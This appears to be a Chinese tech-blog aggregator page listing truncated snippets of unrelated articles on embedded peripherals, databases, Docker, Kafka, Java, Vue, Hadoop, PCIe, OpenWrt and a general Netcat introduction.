高级通信外设&#xff1a;CAN、USBD CAN CAN简介、主要功能与相关API回环模式收发发送特定ID的数据帧实验CAN数据帧的接收实验使用过滤器接收特定的数据帧 USBD USB通信简介USBD设备固件库架构、分层文件与库函数说明USBD模拟键盘应用USBD虚拟串口应用USBD模拟U盘应用...

手工收集统计信息

有时想对某些表收集统计信息 CREATE OR REPLACE PROCEDURE GATHER_STATS ASDECLAREV_SQL1 VARCHAR(1000);--表游标CURSOR C1 ISSELECT (SELECT USER) AS TABLE_OWNER,TABLE_NAMEFROM USER_TABLES; --可以在这里加过滤条件--索引游标CURSOR C2 ISSELECT TABLE_OWNER,INDEX_NAM…...

隧道调频广播覆盖的实现路径:隧道无线广播技术赋能行车安全升级,隧道汽车广播收音系统助力隧道安全管理升级

隧道调频广播覆盖的实现路径:隧道无线广播技术赋能行车安全升级,隧道汽车广播收音系统助力隧道安全管理升级 北京海特伟业科技有限公司任洪卓发布于2025年4月23日 在现代交通基础设施建设中&#xff0c;隧道作为公路、铁路等交通网络的重要组成部分&#xff0c;其内部通信系统…...

深度强化学习(DRL)实战:从AlphaGo到自动驾驶

——从算法原理到产业落地的全链路解析 摘要 本文通过算法对比矩阵、训练流程图解、Python代码实战及产业应用解析&#xff0c;构建从理论创新到工程落地的完整技术栈。实验数据显示&#xff1a;采用PPO算法训练的7自由度机械臂抓取成功率达92%&#xff0c;基于改进型DQN的自…...

【数据可视化-33】病毒式社交媒体潮流与用户参与度可视化分析

&#x1f9d1; 博主简介&#xff1a;曾任某智慧城市类企业算法总监&#xff0c;目前在美国市场的物流公司从事高级算法工程师一职&#xff0c;深耕人工智能领域&#xff0c;精通python数据挖掘、可视化、机器学习等&#xff0c;发表过AI相关的专利并多次在AI类比赛中获奖。CSDN…...

ubuntu使用dify源码安装部署教程+避坑指南

很多人,包括我在最初使用dify的时候都习惯使用docker来部署安装环境,但在二次开发使用过程中,我们可能希望使用源码来安装,那么这篇文章我将给大家分享如何在ubuntu系统下使用源码安装,并提供大家遇到的疑难杂症如下: dify安装使用过程中报错:/console/api/workspaces/…...

软件技术专业

软件技术专业是一个专注于软件开发、测试、维护及相关技术的学科专业。以下是其相关介绍&#xff1a; 专业概述 软件技术专业主要培养具备扎实的软件理论基础和较强的实践能力&#xff0c;能熟练掌握软件开发工具和技术&#xff0c;从事软件设计、开发、测试、维护等工作的高素…...

AI数据分析的利器:解锁BI工具的无限潜力

在数字化浪潮席卷全球的今天&#xff0c;数据已成为企业最宝贵的资产之一。如何高效、准确地分析这些数据&#xff0c;挖掘其中的价值&#xff0c;成为企业决策的关键。AI数据分析&#xff0c;作为新时代的数据分析利器&#xff0c;正逐渐改变着企业的决策方式。而BI&#xff0…...

docker 代理配置冲突问题

问题描述 执行 systemctl show --property=Environment docker 命令看到有如下代理配置 sudo systemctl show --property=Environment docker Environment=HTTP_PROXY=http://127.0.0.1:65001 HTTPS_PROXY=http://127.0.0.1:65001 NO_PROXY=127.0.0.1,docker.io,ghcr.io,uhub…...

清理HiNas(海纳斯) Docker日志并限制日志大小

我在一个机顶盒的HiNas系统上跑Octoprint的docker版本&#xff0c;每隔一段时间盒子空间就被占完了&#xff0c;运行df -h之后&#xff0c;显示/dev/root Use 100%。 Filesystem Size Used Avail Use% Mounted on /dev/root 6.6G 6.6G 0 100% / devtmpfs …...

kafka整合flume与DStream转换

一、Kafka整合flume cd /opt/software/flume/conf/ vi flume-kafka.conf a1.sourcesr1 a1.sinksk1 a1.channelsc1 a1.sources.r1.typespooldirt a1.sources.r1.spoolDir/root/flume-kafka a1.sinks.k1.typeorg.apache.flume.sink.kafka.KafkaSink a1.sinks.k1.kafka.to…...

第2讲:R语言中的色彩美学——科研图表配色指南

目录 一、背景导引:科研图表为何需要“配色讲究”? 二、色彩基础认知:别让“红绿盲”错过你的科研成果 三、R语言中的配色库全景图 四、案例演示与代码实战 🎨案例1:ggplot2 + viridis 配色的热图 🎨案例2:MetBrewer 中的印象派色彩 五、技巧点拨:如何为SCI图…...

C++入门小馆: 深入了解STLlist

嘿&#xff0c;各位技术潮人&#xff01;好久不见甚是想念。生活就像一场奇妙冒险&#xff0c;而编程就是那把超酷的万能钥匙。此刻&#xff0c;阳光洒在键盘上&#xff0c;灵感在指尖跳跃&#xff0c;让我们抛开一切束缚&#xff0c;给平淡日子加点料&#xff0c;注入满满的pa…...

Float32、Float16、BFloat16

我们先介绍 Float32、Float16、BFloat16 的 浮点数表示方法 然后根据浮点数表示&#xff0c;来分析总结他们是怎么控制 精度和 数值范围 的 最后再来对比的说明 Float32、Float16、BFloat16 的 应用场景 和 硬件支持 1、浮点数的表示方法 Float32 &#xff1a; 单精度浮点数…...

多模态深度学习: 从基础到实践

多模态深度学习: 从基础到实践 多模态学习是人工智能领域的前沿方向&#xff0c;它允许模型同时处理和理解多种数据类型。本文将介绍多模态学习的核心概念&#xff0c;以及如何在实际项目中应用这些技术。 什么是多模态学习&#xff1f; 多模态学习涉及处理和整合来自不同来…...

Java学习手册:时间戳、时区等相关概念

一、时间戳 定义 &#xff1a;时间戳是指以秒或毫秒为单位&#xff0c;表示自 1970 年 1 月 1 日 00:00:00 UTC&#xff08;协调世界时&#xff09;以来的 elapsed time。它是衡量时间的一种方式&#xff0c;常用于系统开发中记录事件的发生顺序和具体时间。作用 &#xff1a;…...

Axure全局变量的含义与基础应用

亲爱的小伙伴,在您浏览之前,烦请关注一下,在此深表感谢! Axure产品经理精品视频课已登录CSDN可点击学习https://edu.csdn.net/course/detail/40420 课程主题:全局变量 主要内容:全局变量含义、基础应用 应用场景:元件赋值 案例展示: 案例视频:...

Java 24 深度解析:云原生时代的性能更新与安全重构

一、Java 24 核心特性全景图 Java 24 于 2025 年 3 月正式发布&#xff0c;带来 24 项核心改进&#xff0c;覆盖性能优化、安全性增强、语言升级和云原生支持四大领域。以下是关键特性的全景式解析&#xff1a; 1. 性能优化&#xff1a;从内存到并发的全方位突破 紧凑对象头&…...

ubuntu(28):ubuntu系统多版本conda和多版本cuda共存

0. cuda(包括cudnn)、conda安装照常 注意&#xff1a; &#xff08;1&#xff09;多个conda不要安装到一个目录了&#xff0c;可以见下面的示例目录&#xff1b; &#xff08;2&#xff09;cuda&#xff08;包括cudnn&#xff09;不用纠结是否添加超链接 1. 需要修改环境配置…...

28、.NET 中元数据是什么?

在.NET中&#xff0c;元数据&#xff08;Metadata&#xff09;是描述程序结构和类型信息的二进制数据集合&#xff0c;它是.NET运行时&#xff08;CLR&#xff09;的核心基础组件之一&#xff0c;用于支持程序加载、类型解析、反射、安全校验等关键功能。以下是其核心特性和作用…...

插入html文件,让数据可视化彰显高端大气-Excel易用宝

我们老板整了个html文件的图表&#xff0c;说是html文件图表兼容性更好&#xff0c;现在让我将这个html文件的图表插入到Excel中。 其实这事也简单哈&#xff0c;通过插入web控件&#xff0c;就可以将HTML文件插入到工作表中。 单击【易用宝plus】→【插入Web控件】。 单击【…...

基于HTML+CSS实现的动态导航引导页技术解析

基于HTMLCSS实现的动态导航引导页技术解析 效果展示 核心技术实现 1. 视差背景层 #sence {position: fixed;width: 100vw;height: 100vh;z-index: -1; }#background {width: 140%;height: 140%;position: absolute;background-size: cover;filter: brightness(0.6);animatio…...

【编译原理】 第四章 自上而下语法分析

目录 语法分析器的功能 不确定的自上而下分析 确定的自上而下分析 LL(1)文法 左递归的消除 间接左递归的消除 消除文法中全部左递归的算法 消除回溯、提左因子 FIRST集 FOLLOW集 预测分析法 递归下降分析法 语法分析器的功能 按照文法从源程序单词串&#xff08;符…...

vue入门

Vue入门 目录: 导入快速入门 什么是Vue为什么要学Vue面试题&#xff1a;Vue的特定Vue要学习什么 Vue常用指令 指令介绍表单绑定文本插值绑定属性条件渲染列表渲染事件绑定总结 0.导入 0.1什么是Vue Vue.js&#xff0c;通常称为Vue&#xff0c;是一个用于构建用户界面的渐…...

Unity开发者快速认识Unreal 的BluePrint(二)

前言 前一篇是通过UMG编辑器制作的一个简单ui功能&#xff0c;记录Unity开发者使用BluePrint需要特别注意的地方,这一篇是分析和理解对于场景中的3D物体交互的BluePrint怎么制作&#xff0c;以及需要注意的一些关键点&#xff01;个人觉得最快的学习方式就是对比&#xff0c;入…...

APP和小程序需要注册域名吗?(国科云)

在移动互联网时代&#xff0c;APP和小程序已成为企业和个人提供服务、展示产品的重要渠道。那么APP和小程序的兴起是否对域名造成了冲击&#xff0c;APP和小程序是否需要注册域名呢&#xff1f; APP是否需要注册域名&#xff1f; 从技术上讲&#xff0c;没有域名的APP仍然可以…...

pandas读取MySQL中的数据

使用pandas读取MySQL中的数据 1、导入库 pip install pandas pip install sqlalchemy2、示例代码 # -*- coding: utf-8 -*-import pandas as pd import re from sqlalchemy import create_engine# 清洗文本 def clean_text(text):text...

算法设计与分析6(动态规划)

最长公共子序列和最长公共子串 动态规划的思路与字符串匹配的编辑距离问题相似&#xff0c;对字符串最尾端字符分类讨论 最长公共子序列 可以是不连续出现的&#xff0c;只要出现顺序是一样的 状态转移方程&#xff1a; 最长公共字串 要求连续出现&#xff0c;中断了就归0…...

ubuntu 20.04 编译运行lio-sam,并保存为pcd

1.环境依赖 ubuntu 20.04 ROS1 gtsam sudo add-apt-repository ppa:borglab/gtsam-release-4.0 sudo apt install libgtsam-dev libgtsam-unstable-dev 其他依赖 sudo apt-get install ros-noetic-fake-localization sudo apt-get install ros-noetic-robot-localization…...

国标GB28181视频平台EasyGBS视频监控平台助力打造校园安防智能化

一、方案背景 校园安全是教育管理中的重中之重。随着校园规模的不断扩大和安全管理要求的日益提高&#xff0c;传统的安防手段已难以满足现代校园的需求。EasyGBS作为一款基于国标GB/T28181协议的视频监控平台&#xff0c;能够实现对校园内各类视频监控设备的统一接入、管理和…...

深度解析 Java 泛型通配符 `<? super T>` 和 `<? extends T>`

Java 泛型中的通配符 ? 与 super、extends 关键字组合形成的 <? super T> 和 <? extends T> 是泛型系统中最重要的概念之一&#xff0c;也是许多开发者感到困惑的地方。本文将全面剖析它们的语义、使用场景和设计原理。 一、基础概念回顾 1. 泛型通配符 ? ?…...

iphonex uniapp textarea标签兼容性处理过程梳理

嗨&#xff0c;我是小路。今天主要和大家分享的主题是“iphonex uniapp textarea标签兼容性处理过程梳理”。 在uniapp项目中&#xff0c;经常会使用到uniapp原生的textarea标签&#xff0c;但在手机兼容性这块&#xff0c;textarea并不是很好用&#xff0c;会出现一些…...

SiSi Coin全球共识社区开创Meme币新纪元,通缩机制与社区自治引领Web3未来

SiSi Coin是独家首创新型MeMe币, 通过独特的“黑洞销毁零撸空投”机制打造社交裂变与价值捕获的去中心化生态模式&#xff0c;作为SiSi WEB3 的社区代币&#xff0c;它旨在通过创新的经济模型设计实现长期价值增长。 《采用"黑洞机制"永久销毁加权分配》 核心创新&…...

PCIe具体解释分析

参考文章 PCIe总线详解_STATEABC-GitCode 开源社区 https://zhuanlan.zhihu.com/p/652808759 PCI总线学习(一)&#xff1a;PCI总线结构-CSDN博客 PCI——第1章——PCI总线的基本知识-CSDN博客 计算机中register、cache、memory的区别 - Lines Blog 什么是内存管理单元&#xff…...

OpenWrt 与 Docker:打造轻量级容器化应用平台技术分享

文章目录 前言一、OpenWrt 与 Docker 的集成前提1.1 硬件与内核要求1.2 软件依赖 二、Docker 环境部署与验证2.1 基础服务配置2.2 存储驱动适配 三、容器化应用部署实践3.1 资源限制策略3.2 Docker Compose 适配 四、性能优化与监控4.1 容器资源监控4.2 镜像精简策略 五、典型问…...

sherpa-ncnn:Linux(x86/ARM32/ARM64)构建sherpa-ncnn --语音转文本大模型

更多内容&#xff1a;XiaoJ的知识星球 目录 1.构建sherpa-ncnn2.运行2.1 运行sherpa-ncnn2.2 运行sherpa-ncnn-alsa 1.构建sherpa-ncnn x86构建&#xff1a; git clone https://github.com/k2-fsa/sherpa-ncnn cd sherpa-ncnn mkdir build cd build cmake -DCMAKE_BUILD_TYPE…...

nc工具!Netcat:TCP/IP瑞士军刀!全参数详细教程!Kali Linux教程!

简介 Netcat 是一个简单的 Unix 实用程序&#xff0c;使用 TCP 或 UDP 协议跨网络连接读写数据。它被设计为一个可靠的“后端”工具&#xff0c;可以直接使用&#xff0c;也可以由其他程序和脚本轻松驱动。同时&#xff0c;它也是一个功能丰富的网络调试和探索工具&#xff0c…...

【持续更新】 CDC 跨时钟域处理

在之前的专栏《硬件架构的艺术》里&#xff0c;有讲过亚稳态以及多个时钟的处理办法&#xff0c;但是感觉还是太宽泛了些&#xff0c;不太好理解。在这篇博客里&#xff0c;将主要参考《Clock Domain Crossing (CDC) Design & Verification Techniques Using SystemVerilog…...

Mybatis-Plus,IDEA2024版本

目录 1、Mybatis-Plus介绍 2、Mybatis-Plus作用 3、Mybatis-Plus使用 1、引入依赖 2、配置数据库 3、生成代码 1、Mybatis-Plus介绍 Mybatis-Plus是在Mybatis的基础上进行的功能拓展&#xff0c;也就是Mybatis有的功能&#xff0c;Plus也有&#xff0c;而且比Mybatis更好用…...

LeNet5 神经网络的参数解析和图片尺寸解析

1.LeNet-5 神经网络 以下是针对 LeNet-5 神经网络的详细参数解析和图片尺寸变化分析&#xff0c;和原始论文设计&#xff0c;通过分步计算说明各层的张量变换过程。 经典的 LeNet-5架构简化版&#xff08;原始论文输入为 32x32&#xff0c;MNIST 常用 28x28 需调整&#xff09…...

hadoop-3.3.5.tar.gz 镜像

清华大学镜像站 wget https://mirrors.tuna.tsinghua.edu.cn/apache/hadoop/common/hadoop-3.3.5/hadoop-3.3.5.tar.gz 阿里云镜像站 wget https://mirrors.aliyun.com/apache/hadoop/common/hadoop-3.3.5/hadoop-3.3.5.tar.gz 华为云镜像站 wget https://mirrors.huaweiclo…...

SD2351核心板:重构AI视觉产业价值链的“超级节点”

在AI视觉技术狂飙突进的当下&#xff0c;一个吊诡的现象正在浮现&#xff1a;一方面&#xff0c;学术界不断刷新着ImageNet等基准测试的精度纪录&#xff1b;另一方面&#xff0c;产业界却深陷“算法有、场景无&#xff0c;技术强、落地难”的怪圈。明远智睿SD2351核心板的问世…...

C++23中if consteval / if not consteval (P1938R3) 详解

文章目录 引言基本概念consteval 回顾if consteval 和 if not consteval 的定义语法规则 设计目的解决现有问题增强代码的可读性和可维护性提高代码的性能和安全性 使用示例简单示例复杂示例 与其他特性的对比与 if constexpr 的对比与 std::is_constant_evaluated() 的对比 实…...

IPOF(Input-Process-Output-Feedback)方法学简介

一、背景知识&#xff1a;IPO与IPOF的基本概念 1. IPO&#xff08;Input-Process-Output&#xff0c;输入-处理-输出&#xff09; IPO是计算机科学、系统工程和设计领域中最基础的模型之一&#xff0c;用于描述系统如何将输入通过处理逻辑转换为输出。其核心是线性的单向流程…...